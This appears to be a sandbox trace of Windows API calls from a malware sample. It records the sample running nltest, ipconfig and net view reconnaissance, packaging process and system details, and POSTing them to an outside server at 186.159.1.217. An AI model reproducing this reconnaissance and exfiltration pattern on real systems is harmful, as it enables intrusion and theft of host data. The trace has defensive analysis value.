	[0249.851] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x284908 | out: hHeap=0x270000) returned 1
	[0249.851] GetProcessHeap () returned 0x270000
	[0249.851] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x2b01d0 | out: hHeap=0x270000) returned 1
	[0249.851] CloseHandle (hObject=0x14c) returned 1
	[0249.851] CloseHandle (hObject=0x150) returned 1
	[0249.851] CloseHandle (hObject=0x15c) returned 1
	[0249.851] CloseHandle (hObject=0x160) returned 1
	[0249.851] CloseHandle (hObject=0x154) returned 1
	[0249.851] CloseHandle (hObject=0x158) returned 1
	[0249.851] CreatePipe (in: hReadPipe=0x170f7b4, hWritePipe=0x170f7a4, lpPipeAttributes=0x170f780, nSize=0x0 | out: hReadPipe=0x170f7b4*=0x158, hWritePipe=0x170f7a4*=0x154) returned 1
	[0249.851] SetHandleInformation (hObject=0x158, dwMask=0x1, dwFlags=0x0) returned 1
	[0249.851] CreatePipe (in: hReadPipe=0x170f7ac, hWritePipe=0x170f7a8, lpPipeAttributes=0x170f780, nSize=0x0 | out: hReadPipe=0x170f7ac*=0x160, hWritePipe=0x170f7a8*=0x15c) returned 1
	[0249.851] SetHandleInformation (hObject=0x15c, dwMask=0x1, dwFlags=0x0) returned 1
	[0249.851] GetSystemDirectoryA (in: lpBuffer=0x170f618, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0249.851] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\cmd.exe" | out: lpString1="C:\\Windows\\system32\\cmd.exe") returned="C:\\Windows\\system32\\cmd.exe"
	[0249.851] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c nltest /domain_trusts /all_trusts", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x170f720*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x160, hStdOutput=0x154, hStdError=0x154), lpProcessInformation=0x170f770 | out: lpCommandLine="/c nltest /domain_trusts /all_trusts", lpProcessInformation=0x170f770*(hProcess=0x14c, hThread=0x150, dwProcessId=0xf1c, dwThreadId=0xf10)) returned 1
	[0249.856] wvsprintfA (in: param_1=0x170edf4, param_2="\x09\x09%s\r\n", arglist=0x170f204 | out: param_1="\x09\x09/c nltest /domain_trusts /all_trusts\r\n") returned 40
	[0249.856] GetProcessHeap () returned 0x270000
	[0249.856] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x29) returned 0x28b1f0
	[0249.856] PeekNamedPipe (in: hNamedPipe=0x158, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.856] Sleep (dwMilliseconds=0x2710) 
	[0249.894] PeekNamedPipe (in: hNamedPipe=0x158, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.896] Sleep (dwMilliseconds=0x2710) 
	[0249.917] PeekNamedPipe (in: hNamedPipe=0x158, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.917] Sleep (dwMilliseconds=0x2710) 
	[0249.938] PeekNamedPipe (in: hNamedPipe=0x158, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.939] Sleep (dwMilliseconds=0x2710) 
	[0249.948] PeekNamedPipe (in: hNamedPipe=0x158, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0249.948] Sleep (dwMilliseconds=0x2710) 
	[0250.003] PeekNamedPipe (in: hNamedPipe=0x158, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0250.004] Sleep (dwMilliseconds=0x2710) 
	[0250.010] PeekNamedPipe (in: hNamedPipe=0x158, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0250.010] Sleep (dwMilliseconds=0x2710) 
	[0250.053] PeekNamedPipe (in: hNamedPipe=0x158, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0250.053] Sleep (dwMilliseconds=0x2710) 
	[0250.070] PeekNamedPipe (in: hNamedPipe=0x158, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x48, lpTotalBytesAvail=0x170f76c*=0x48, lpBytesLeftThisMessage=0x0) returned 1
	[0250.070] ReadFile (in: hFile=0x158, lpBuffer=0x170f218, nNumberOfBytesToRead=0x48, lpNumberOfBytesRead=0x170f7b0, lpOverlapped=0x0 | out: lpBuffer=0x170f218*, lpNumberOfBytesRead=0x170f7b0*=0x48, lpOverlapped=0x0) returned 1
	[0250.070] GetProcessHeap () returned 0x270000
	[0250.070] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x28b1f0, Size=0x70) returned 0x2aff18
	[0250.070] PeekNamedPipe (in: hNamedPipe=0x158, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0250.070] wvsprintfA (in: param_1=0x170edf8, param_2="\r\n\r\n", arglist=0x170f208 | out: param_1="\r\n\r\n") returned 4
	[0250.070] GetProcessHeap () returned 0x270000
	[0250.070] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2aff18, Size=0x74) returned 0x2aff18
	[0250.071] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x2aff18, cbMultiByte=116, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 116
	[0250.071] GetProcessHeap () returned 0x270000
	[0250.071] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xe8) returned 0x2b17d8
	[0250.071] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x2aff18, cbMultiByte=116, lpWideCharStr=0x2b17d8, cchWideChar=116 | out: lpWideCharStr="\x09\x09/c nltest /domain_trusts /all_trusts\r\nEnumerating domain trusts failed: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF\r\n\r\n\r\n苴翗᳏") returned 116
	[0250.071] GetProcessHeap () returned 0x270000
	[0250.071] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2ba5b0, Size=0x1f0e) returned 0x2ba5b0
	[0250.071] GetProcessHeap () returned 0x270000
	[0250.071] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x2b17d8 | out: hHeap=0x270000) returned 1
	[0250.071] GetProcessHeap () returned 0x270000
	[0250.071] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x2aff18 | out: hHeap=0x270000) returned 1
	[0250.071] CloseHandle (hObject=0x160) returned 1
	[0250.071] CloseHandle (hObject=0x15c) returned 1
	[0250.071] CloseHandle (hObject=0x158) returned 1
	[0250.071] CloseHandle (hObject=0x154) returned 1
	[0250.071] CloseHandle (hObject=0x150) returned 1
	[0250.071] CloseHandle (hObject=0x14c) returned 1
	[0250.071] CoCreateInstance (in: rclsid=0x170f780*(Data1=0x50b6327f, Data2=0xafd1, Data3=0x11d2, Data4=([0]=0x9c, [1]=0xb9, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x7a, [6]=0x36, [7]=0x9e)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x170f794*(Data1=0x5bb11929, Data2=0xafd1, Data3=0x11d2, Data4=([0]=0x9c, [1]=0xb9, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x7a, [6]=0x36, [7]=0x9e)), ppv=0x170f7b0 | out: ppv=0x170f7b0*=0x2b04a4) returned 0x0
	[0250.095] ADSystemInfo:IADsADSystemInfo:get_UserName (in: This=0x2b04a4, retval=0x170f7b4 | out: retval=0x170f7b4) returned 0x80070534
	[0250.102] ADSystemInfo:IUnknown:Release (This=0x2b04a4) returned 0x0
	[0250.103] _vsnwprintf_s (in: _Buffer=0x170efac, _BufferCount=0x400, _MaxCount=0x3ff, _Format="--%s--\r\n\r\n", _ArgList=0x170f7bc | out: _Buffer="--Arasfjasu7--\r\n\r\n") returned 18
	[0250.103] lstrlenW (lpString="--Arasfjasu7--\r\n\r\n") returned 18
	[0250.103] GetProcessHeap () returned 0x270000
	[0250.103] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2ba5b0, Size=0x1f32) returned 0x2bf200
	[0250.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="--Arasfjasu7\r\nContent-Disposition: form-data; name=\"proclist\"\r\n\r\n\x09\x09***PROCESS LIST***\r\n\r\n[System Process]\r\nSystem\r\nsmss.exe\r\ncsrss.exe\r\nwininit.exe\r\ncsrss.exe\r\nwinlogon.exe\r\nservices.exe\r\nlsass.exe\r\nlsm.exe\r\nsvchost.exe\r\nsvchost.exe\r\nsvchost.exe\r\nsvchost.exe\r\nsvchost.exe\r\nsvchost.exe\r\nsvchost.exe\r\nspoolsv.exe\r\nsvchost.exe\r\ntaskhost.exe\r\ntaskeng.exe\r\nsvchost.exe\r\nWmiPrvSE.exe\r\nsppsvc.exe\r\ndwm.exe\r\nexplorer.exe\r\naudiodg.exe\r\nshirts_cumshots_compaq.exe\r\nleague.exe\r\njs_sound.exe\r\nbeast-dry.exe\r\nforecastsgeographic.exe\r\nreno.exe\r\nspecreformwear.exe\r\nrr_publications.exe\r\nsolo.exe\r\nbeam.exe\r\nconfigurations.exe\r\nfact-film-anticipated.exe\r\nwanting villages.exe\r\nengagementresearchersmonkey.exe\r\nsurgical-marcus.exe\r\niexplore.exe\r\niexplore.exe\r\ntaskeng.exe\r\ntadiapce.exe\r\nsvchost.exe\r\nsvchost.exe\r\nsvchost.exe\r\ndllhost.exe\r\nsvchost.exe\r\n\r\n\r\n--Arasfjasu7\r\nContent-Disposition: form-data; name=\"sysinfo\"\r\n\r\n\x09\x09***SYSTEMINFO***\r\n\r\nHost Name - ZGW5TDPU\r\nOS Name - Microsoft Windows 7 Professional \r\nOS Version - Service Pack 1\r\nOS Architecture - 32-bit\r\nProduct Type - Workstation\r\nBuild Type - Multiprocessor Free\r\nRegistered Owner - F7dWPzanSah\r\nRegistered Organization - GhGbtFHB9NFP vlk7C10g6 Hehen9\r\nSerial Number - 00371-OEM-8978064-40862\r\nInstall Date - 30/12/1899 00.00.00\r\nLast Boot Up Time - 30/12/1899 00.00.00\r\nWindows Directory - C:\\Windows\r\nSystem Directory - C:\\Windows\\system32\r\nBoot Device - \\Device\\HarddiskVolume1\r\n\r\nTotal Physical Memory - 2753 Mb\r\nAvailable Physical Memory - 2753 Mb\r\n\r\n\r\n\x09\x09/c ipconfig /all\r\n\r\nWindows IP Configuration\r\n\r\n   Host Name . . . . . . . . . . . . : ZgW5tdPu\r\n   Primary Dns Suffix  . . . . . . . : \r\n   Node Type . . . . . . . . . . . . : Hybrid\r\n   IP Routing Enabled. . . . . . . . : No\r\n   WINS Proxy Enabled. . . . . . . . : No\r\n\r\nEthernet adapter Local Area Connection:\r\n\r\n   Connection-specific DNS Suffix  . : \r\n   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection\r\n   Physical Address. . . . . . . . . : 00-0A-91-6E-33-D9\r\n   DHCP Enabled. . . . . . . . . . . : Yes\r\n   Autoconfiguration Enabled . . . . : Yes\r\n   Link-local IPv6 Address . . . . . : fe80::9594:91b6:d807:49d3%11(Preferred) \r\n   IPv4 Address. . . . . . . . . . . : 192.168.0.251(Preferred) \r\n   Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n   Lease Obtained. . . . . . . . . . : Tuesday, May 14, 2019 3:30:31 PM\r\n   Lease Expires . . . . . . . . . . : Tuesday, May 14, 2019 4:30:30 PM\r\n   Default Gateway . . . . . . . . . : 192.168.0.1\r\n   DHCP Server . . . . . . . . . . . : 192.168.0.1\r\n   DHCPv6 IAID . . . . . . . . . . . : 234938623\r\n   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-21-7A-B4-D4-00-E0-FF-8A-6A-66\r\n   DNS Servers . . . . . . . . . . . : 192.168.0.1\r\n   NetBIOS over Tcpip. . . . . . . . : Enabled\r\n\r\nTunnel adapter isatap.{D303B40D-CBB0-4CD4-933A-0697F06EA7C1}:\r\n\r\n   Media State . . . . . . . . . . . : Media disconnected\r\n   Connection-specific DNS Suffix  . : \r\n   Description . . . . . . . . . . . : Microsoft ISATAP Adapter\r\n   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\r\n   DHCP Enabled. . . . . . . . . . . : No\r\n   Autoconfiguration Enabled . . . . : Yes\r\n\r\n\r\n\x09\x09/c net config workstation\r\nComputer name                        \\\\ZGW5TDPU\r\nFull Computer name                   ZgW5tdPu\r\nUser name                            2XC7u663GxWc\r\n\r\nWorkstation active on                \r\n\x09NetBT_Tcpip_{D303B40D-CBB0-4CD4-933A-0697F06EA7C1} (000A916E33D9)\r\n\r\nSoftware version                     Windows 7 Professional\r\n\r\nWorkstation domain                   WORKGROUP\r\nLogon domain                         ZGW5TDPU\r\n\r\nCOM Open Timeout (sec)               0\r\nCOM Send Count (byte)                16\r\nCOM Send Timeout (msec)              250\r\nThe command completed successfully.\r\n\r\n\r\n\r\n\x09\x09/c net view /all\r\n\r\n\r\n\x09\x09/c net view /all /domain\r\n\r\n\r\n\x09\x09/c nltest /domain_trusts\r\n\r\n\r\n\x09\x09/c nltest /domain_trusts /all_trusts\r\nEnumerating domain trusts failed: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF\r\n\r\n\r\n--Arasfjasu7--\r\n\r\n", cchWideChar=3993, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3993
	[0250.103] GetProcessHeap () returned 0x270000
	[0250.103] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xf99) returned 0x2c5940
	[0250.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="--Arasfjasu7\r\nContent-Disposition: form-data; name=\"proclist\"\r\n\r\n\x09\x09***PROCESS LIST***\r\n\r\n[System Process]\r\nSystem\r\nsmss.exe\r\ncsrss.exe\r\nwininit.exe\r\ncsrss.exe\r\nwinlogon.exe\r\nservices.exe\r\nlsass.exe\r\nlsm.exe\r\nsvchost.exe\r\nsvchost.exe\r\nsvchost.exe\r\nsvchost.exe\r\nsvchost.exe\r\nsvchost.exe\r\nsvchost.exe\r\nspoolsv.exe\r\nsvchost.exe\r\ntaskhost.exe\r\ntaskeng.exe\r\nsvchost.exe\r\nWmiPrvSE.exe\r\nsppsvc.exe\r\ndwm.exe\r\nexplorer.exe\r\naudiodg.exe\r\nshirts_cumshots_compaq.exe\r\nleague.exe\r\njs_sound.exe\r\nbeast-dry.exe\r\nforecastsgeographic.exe\r\nreno.exe\r\nspecreformwear.exe\r\nrr_publications.exe\r\nsolo.exe\r\nbeam.exe\r\nconfigurations.exe\r\nfact-film-anticipated.exe\r\nwanting villages.exe\r\nengagementresearchersmonkey.exe\r\nsurgical-marcus.exe\r\niexplore.exe\r\niexplore.exe\r\ntaskeng.exe\r\ntadiapce.exe\r\nsvchost.exe\r\nsvchost.exe\r\nsvchost.exe\r\ndllhost.exe\r\nsvchost.exe\r\n\r\n\r\n--Arasfjasu7\r\nContent-Disposition: form-data; name=\"sysinfo\"\r\n\r\n\x09\x09***SYSTEMINFO***\r\n\r\nHost Name - ZGW5TDPU\r\nOS Name - Microsoft Windows 7 Professional \r\nOS Version - Service Pack 1\r\nOS Architecture - 32-bit\r\nProduct Type - Workstation\r\nBuild Type - Multiprocessor Free\r\nRegistered Owner - F7dWPzanSah\r\nRegistered Organization - GhGbtFHB9NFP vlk7C10g6 Hehen9\r\nSerial Number - 00371-OEM-8978064-40862\r\nInstall Date - 30/12/1899 00.00.00\r\nLast Boot Up Time - 30/12/1899 00.00.00\r\nWindows Directory - C:\\Windows\r\nSystem Directory - C:\\Windows\\system32\r\nBoot Device - \\Device\\HarddiskVolume1\r\n\r\nTotal Physical Memory - 2753 Mb\r\nAvailable Physical Memory - 2753 Mb\r\n\r\n\r\n\x09\x09/c ipconfig /all\r\n\r\nWindows IP Configuration\r\n\r\n   Host Name . . . . . . . . . . . . : ZgW5tdPu\r\n   Primary Dns Suffix  . . . . . . . : \r\n   Node Type . . . . . . . . . . . . : Hybrid\r\n   IP Routing Enabled. . . . . . . . : No\r\n   WINS Proxy Enabled. . . . . . . . : No\r\n\r\nEthernet adapter Local Area Connection:\r\n\r\n   Connection-specific DNS Suffix  . : \r\n   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection\r\n   Physical Address. . . . . . . . . : 00-0A-91-6E-33-D9\r\n   DHCP Enabled. . . . . . . . . . . : Yes\r\n   Autoconfiguration Enabled . . . . : Yes\r\n   Link-local IPv6 Address . . . . . : fe80::9594:91b6:d807:49d3%11(Preferred) \r\n   IPv4 Address. . . . . . . . . . . : 192.168.0.251(Preferred) \r\n   Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n   Lease Obtained. . . . . . . . . . : Tuesday, May 14, 2019 3:30:31 PM\r\n   Lease Expires . . . . . . . . . . : Tuesday, May 14, 2019 4:30:30 PM\r\n   Default Gateway . . . . . . . . . : 192.168.0.1\r\n   DHCP Server . . . . . . . . . . . : 192.168.0.1\r\n   DHCPv6 IAID . . . . . . . . . . . : 234938623\r\n   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-21-7A-B4-D4-00-E0-FF-8A-6A-66\r\n   DNS Servers . . . . . . . . . . . : 192.168.0.1\r\n   NetBIOS over Tcpip. . . . . . . . : Enabled\r\n\r\nTunnel adapter isatap.{D303B40D-CBB0-4CD4-933A-0697F06EA7C1}:\r\n\r\n   Media State . . . . . . . . . . . : Media disconnected\r\n   Connection-specific DNS Suffix  . : \r\n   Description . . . . . . . . . . . : Microsoft ISATAP Adapter\r\n   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\r\n   DHCP Enabled. . . . . . . . . . . : No\r\n   Autoconfiguration Enabled . . . . : Yes\r\n\r\n\r\n\x09\x09/c net config workstation\r\nComputer name                        \\\\ZGW5TDPU\r\nFull Computer name                   ZgW5tdPu\r\nUser name                            2XC7u663GxWc\r\n\r\nWorkstation active on                \r\n\x09NetBT_Tcpip_{D303B40D-CBB0-4CD4-933A-0697F06EA7C1} (000A916E33D9)\r\n\r\nSoftware version                     Windows 7 Professional\r\n\r\nWorkstation domain                   WORKGROUP\r\nLogon domain                         ZGW5TDPU\r\n\r\nCOM Open Timeout (sec)               0\r\nCOM Send Count (byte)                16\r\nCOM Send Timeout (msec)              250\r\nThe command completed successfully.\r\n\r\n\r\n\r\n\x09\x09/c net view /all\r\n\r\n\r\n\x09\x09/c net view /all /domain\r\n\r\n\r\n\x09\x09/c nltest /domain_trusts\r\n\r\n\r\n\x09\x09/c nltest /domain_trusts /all_trusts\r\nEnumerating domain trusts failed: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF\r\n\r\n\r\n--Arasfjasu7--\r\n\r\n", cchWideChar=3993, lpMultiByteStr=0x2c5940, cbMultiByte=3993, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="--Arasfjasu7\r\nContent-Disposition: form-data; name=\"proclist\"\r\n\r\n\x09\x09***PROCESS LIST***\r\n\r\n[System Process]\r\nSystem\r\nsmss.exe\r\ncsrss.exe\r\nwininit.exe\r\ncsrss.exe\r\nwinlogon.exe\r\nservices.exe\r\nlsass.exe\r\nlsm.exe\r\nsvchost.exe\r\nsvchost.exe\r\nsvchost.exe\r\nsvchost.exe\r\nsvchost.exe\r\nsvchost.exe\r\nsvchost.exe\r\nspoolsv.exe\r\nsvchost.exe\r\ntaskhost.exe\r\ntaskeng.exe\r\nsvchost.exe\r\nWmiPrvSE.exe\r\nsppsvc.exe\r\ndwm.exe\r\nexplorer.exe\r\naudiodg.exe\r\nshirts_cumshots_compaq.exe\r\nleague.exe\r\njs_sound.exe\r\nbeast-dry.exe\r\nforecastsgeographic.exe\r\nreno.exe\r\nspecreformwear.exe\r\nrr_publications.exe\r\nsolo.exe\r\nbeam.exe\r\nconfigurations.exe\r\nfact-film-anticipated.exe\r\nwanting villages.exe\r\nengagementresearchersmonkey.exe\r\nsurgical-marcus.exe\r\niexplore.exe\r\niexplore.exe\r\ntaskeng.exe\r\ntadiapce.exe\r\nsvchost.exe\r\nsvchost.exe\r\nsvchost.exe\r\ndllhost.exe\r\nsvchost.exe\r\n\r\n\r\n--Arasfjasu7\r\nContent-Disposition: form-data; name=\"sysinfo\"\r\n\r\n\x09\x09***SYSTEMINFO***\r\n\r\nHost Name - ZGW5TDPU\r\nOS Name - Microsoft Windows 7 Professional \r\nOS Version - Service Pack 1\r\nOS Architecture - 32-bit\r\nProduct Type - Workstation\r\nBuild Type - Multiprocessor Free\r\nRegistered Owner - F7dWPzanSah\r\nRegistered Organization - GhGbtFHB9NFP vlk7C10g6 Hehen9\r\nSerial Number - 00371-OEM-8978064-40862\r\nInstall Date - 30/12/1899 00.00.00\r\nLast Boot Up Time - 30/12/1899 00.00.00\r\nWindows Directory - C:\\Windows\r\nSystem Directory - C:\\Windows\\system32\r\nBoot Device - \\Device\\HarddiskVolume1\r\n\r\nTotal Physical Memory - 2753 Mb\r\nAvailable Physical Memory - 2753 Mb\r\n\r\n\r\n\x09\x09/c ipconfig /all\r\n\r\nWindows IP Configuration\r\n\r\n   Host Name . . . . . . . . . . . . : ZgW5tdPu\r\n   Primary Dns Suffix  . . . . . . . : \r\n   Node Type . . . . . . . . . . . . : Hybrid\r\n   IP Routing Enabled. . . . . . . . : No\r\n   WINS Proxy Enabled. . . . . . . . : No\r\n\r\nEthernet adapter Local Area Connection:\r\n\r\n   Connection-specific DNS Suffix  . : \r\n   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection\r\n   Physical Address. . . . . . . . . : 00-0A-91-6E-33-D9\r\n   DHCP Enabled. . . . . . . . . . . : Yes\r\n   Autoconfiguration Enabled . . . . : Yes\r\n   Link-local IPv6 Address . . . . . : fe80::9594:91b6:d807:49d3%11(Preferred) \r\n   IPv4 Address. . . . . . . . . . . : 192.168.0.251(Preferred) \r\n   Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n   Lease Obtained. . . . . . . . . . : Tuesday, May 14, 2019 3:30:31 PM\r\n   Lease Expires . . . . . . . . . . : Tuesday, May 14, 2019 4:30:30 PM\r\n   Default Gateway . . . . . . . . . : 192.168.0.1\r\n   DHCP Server . . . . . . . . . . . : 192.168.0.1\r\n   DHCPv6 IAID . . . . . . . . . . . : 234938623\r\n   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-21-7A-B4-D4-00-E0-FF-8A-6A-66\r\n   DNS Servers . . . . . . . . . . . : 192.168.0.1\r\n   NetBIOS over Tcpip. . . . . . . . : Enabled\r\n\r\nTunnel adapter isatap.{D303B40D-CBB0-4CD4-933A-0697F06EA7C1}:\r\n\r\n   Media State . . . . . . . . . . . : Media disconnected\r\n   Connection-specific DNS Suffix  . : \r\n   Description . . . . . . . . . . . : Microsoft ISATAP Adapter\r\n   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\r\n   DHCP Enabled. . . . . . . . . . . : No\r\n   Autoconfiguration Enabled . . . . : Yes\r\n\r\n\r\n\x09\x09/c net config workstation\r\nComputer name                        \\\\ZGW5TDPU\r\nFull Computer name                   ZgW5tdPu\r\nUser name                            2XC7u663GxWc\r\n\r\nWorkstation active on                \r\n\x09NetBT_Tcpip_{D303B40D-CBB0-4CD4-933A-0697F06EA7C1} (000A916E33D9)\r\n\r\nSoftware version                     Windows 7 Professional\r\n\r\nWorkstation domain                   WORKGROUP\r\nLogon domain                         ZGW5TDPU\r\n\r\nCOM Open Timeout (sec)               0\r\nCOM Send Count (byte)                16\r\nCOM Send Timeout (msec)              250\r\nThe command completed successfully.\r\n\r\n\r\n\r\n\x09\x09/c net view /all\r\n\r\n\r\n\x09\x09/c net view /all /domain\r\n\r\n\r\n\x09\x09/c nltest /domain_trusts\r\n\r\n\r\n\x09\x09/c nltest /domain_trusts /all_trusts\r\nEnumerating domain trusts failed: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF\r\n\r\n\r\n--Arasfjasu7--\r\n\r\n", lpUsedDefaultChar=0x0) returned 3993
	[0250.104] wsprintfW (in: param_1=0x170f2fc, param_2="/%s/%s/90" | out: param_1="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/90") returned 60
	[0250.104] wsprintfW (in: param_1=0x170eafc, param_2="Content-Type: multipart/form-data; boundary=%s" | out: param_1="Content-Type: multipart/form-data; boundary=Arasfjasu7") returned 54
	[0250.104] InternetOpenW (lpszAgent="test", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
	[0250.171] InternetConnectW (hInternet=0xcc0004, lpszServerName="186.159.1.217", nServerPort=0x1f92, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
	[0250.172] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/90", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x0, dwContext=0x1) returned 0xcc000c
	[0250.173] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data; boundary=Arasfjasu7", dwHeadersLength=0xffffffff, lpOptional=0x2c5940*, dwOptionalLength=0xf99) returned 1
	[0252.779] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x170f6fc, dwNumberOfBytesToRead=0x7f, lpdwNumberOfBytesRead=0x170f78c | out: lpBuffer=0x170f6fc*, lpdwNumberOfBytesRead=0x170f78c*=0x3) returned 1
	[0252.780] ResetEvent (hEvent=0xc) returned 1
	[0252.780] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0253.597] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x170f6fc, dwNumberOfBytesToRead=0x7f, lpdwNumberOfBytesRead=0x170f78c | out: lpBuffer=0x170f6fc*, lpdwNumberOfBytesRead=0x170f78c*=0x0) returned 1
	[0253.598] ResetEvent (hEvent=0xc) returned 1
	[0253.598] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0256.607] InternetCloseHandle (hInternet=0xcc0004) returned 1
	[0256.608] InternetCloseHandle (hInternet=0xcc0008) returned 0
	[0256.608] InternetCloseHandle (hInternet=0xcc000c) returned 0
	[0256.608] GetProcessHeap () returned 0x270000
	[0256.608] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x28dce0 | out: hHeap=0x270000) returned 1
	[0256.608] GetProcessHeap () returned 0x270000
	[0256.608] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x28e4f8 | out: hHeap=0x270000) returned 1
